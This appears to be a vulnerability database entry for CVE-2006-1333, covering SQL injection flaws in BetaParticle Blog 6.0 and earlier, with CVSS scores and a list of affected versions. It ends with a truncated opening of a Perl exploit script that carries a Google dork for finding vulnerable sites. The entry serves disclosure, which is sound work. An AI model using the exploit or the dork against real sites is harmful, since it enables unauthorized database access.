6.4
CVSSv2

CVE-2006-1333

Published: 21/03/2006 Updated: 21/07/2017
CVSS v2 Base Score: 6.4 | Impact Score: 4.9 | Exploitability Score: 10
VMScore: 645
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:N

Vulnerability Summary

Multiple SQL injection vulnerabilities in BetaParticle Blog 6.0 and previous versions allow remote malicious users to execute arbitrary SQL commands via the (1) id parameter to template_permalink.asp or (2) fldGalleryID parameter to template_gallery_detail.asp.

Vulnerable Product Search on Vulmon Subscribe to Product

betaparticle betaparticle blog 6.0

betaparticle betaparticle blog 3.0

betaparticle betaparticle blog 4.0

betaparticle betaparticle blog 5.0

Exploits

#!/usr/bin/perl #Method found & Exploit scripted by nukedx #Contacts > ICQ: 10072 MSN/Main: nukedx@nukedxcom web: wwwnukedxcom #Original advisory: wwwnukedxcom/?viewdoc=20 #Usage: betapl <host> <path> #googledork: [ "Powered by bp blog" ] 9710 pages use IO::Socket; if(@ARGV != 2) { usage(); } else { exploit(); } s ...